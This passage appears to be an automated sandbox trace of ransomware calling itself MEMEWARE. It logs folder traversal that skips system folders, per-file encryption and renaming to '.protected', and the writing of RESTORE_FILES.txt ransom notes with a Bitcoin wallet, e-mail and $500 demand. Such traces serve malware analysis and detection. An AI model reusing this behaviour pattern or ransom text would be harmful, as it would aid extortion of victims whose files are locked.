lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.102] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.102] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.103] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.103] CloseHandle (hObject=0x154) returned 1 [0085.104] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.protected") returned 108 [0085.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd.protected")) returned 1 [0085.116] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="Windows") returned -1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="Program Files") returned -1 [0085.117] lstrcmpiW 
(lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="Program Files (x86)") returned -1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="$Recycle.bin") returned 1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="System Volume Information") returned -1 [0085.117] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0085.117] StrStrIW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".protected") returned 0x0 [0085.117] lstrcmpW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="RESTORE_FILES.txt") returned -1 [0085.117] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.117] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0085.117] StrStrW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".txt") returned 0x0 [0085.117] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0085.117] StrStrW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".rar") returned 0x0 [0085.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0085.118] StrStrW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".zip") returned 0x0 [0085.118] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.119] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.119] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.120] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.120] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.120] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.120] CloseHandle (hObject=0x154) returned 1 [0085.128] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.protected") returned 142 [0085.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd.protected")) returned 1 [0085.129] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.129] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="Windows") returned -1 [0085.129] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="Program Files") returned -1 [0085.130] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="Program Files (x86)") returned -1 [0085.130] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="$Recycle.bin") returned 1 [0085.130] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="System Volume Information") returned -1 [0085.130] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0085.130] StrStrIW (lpFirst="FSF-CTBL.FSF", lpSrch=".protected") returned 0x0 [0085.130] lstrcmpW (lpString1="FSF-CTBL.FSF", lpString2="RESTORE_FILES.txt") returned -1 [0085.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0085.130] StrStrW (lpFirst="FSF-CTBL.FSF", lpSrch=".txt") returned 0x0 [0085.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0085.130] StrStrW (lpFirst="FSF-CTBL.FSF", lpSrch=".rar") returned 0x0 [0085.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0085.130] StrStrW (lpFirst="FSF-CTBL.FSF", lpSrch=".zip") returned 0x0 [0085.131] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x72, lpOverlapped=0x0) returned 1 [0085.132] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.132] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x72, lpOverlapped=0x0) returned 1 [0085.132] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0085.132] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.132] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.133] CloseHandle (hObject=0x154) returned 1 [0085.133] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.protected") returned 108 [0085.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf.protected")) returned 1 [0085.134] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.134] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.134] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\RESTORE_FILES.txt") returned 103 [0085.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.134] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.134] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.135] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.135] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.136] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.136] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0085.136] CloseHandle (hObject=0x150) returned 1 [0085.136] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.136] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.136] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\RESTORE_FILES.txt") returned 87 [0085.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.136] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.136] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, 
lpOverlapped=0x0) returned 1 [0085.137] lstrlenA (lpString="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") returned 684 [0085.137] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.137] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.137] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.137] CloseHandle (hObject=0x14c) returned 1 [0085.138] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.138] lstrcmpiW (lpString1="Groove", lpString2="Windows") returned -1 [0085.139] lstrcmpiW (lpString1="Groove", lpString2="Program Files") returned -1 [0085.139] lstrcmpiW (lpString1="Groove", lpString2="Program Files (x86)") returned -1 [0085.139] lstrcmpiW (lpString1="Groove", lpString2="$Recycle.bin") returned 1 [0085.139] lstrcmpiW (lpString1="Groove", lpString2="System Volume Information") returned -1 [0085.139] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove") returned 71 [0085.139] lstrcmpW (lpString1="Groove", lpString2=".") returned 1 [0085.139] lstrcmpW (lpString1="Groove", lpString2="..") returned 1 [0085.139] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\*") returned 73 [0085.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.139] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.139] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.139] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.139] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.139] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.139] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\.") returned 73 [0085.139] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.139] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.140] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.140] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.140] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.140] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.140] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.140] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\..") returned 74 [0085.140] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.140] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.140] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.140] lstrcmpiW (lpString1="System", lpString2="Windows") returned -1 [0085.140] lstrcmpiW (lpString1="System", lpString2="Program Files") returned 1 [0085.140] lstrcmpiW (lpString1="System", lpString2="Program Files (x86)") returned 1 [0085.140] lstrcmpiW 
(lpString1="System", lpString2="$Recycle.bin") returned 1 [0085.140] lstrcmpiW (lpString1="System", lpString2="System Volume Information") returned -1 [0085.140] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System") returned 78 [0085.140] lstrcmpW (lpString1="System", lpString2=".") returned 1 [0085.140] lstrcmpW (lpString1="System", lpString2="..") returned 1 [0085.141] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\*") returned 80 [0085.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0085.141] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.141] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.141] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.141] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.141] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.141] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\.") returned 80 [0085.141] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.141] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.141] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.141] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.141] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.141] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.141] lstrcmpiW 
(lpString1="..", lpString2="System Volume Information") returned -1 [0085.141] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\..") returned 81 [0085.141] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.141] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.141] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.141] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.141] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\RESTORE_FILES.txt") returned 96 [0085.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\system\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.142] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
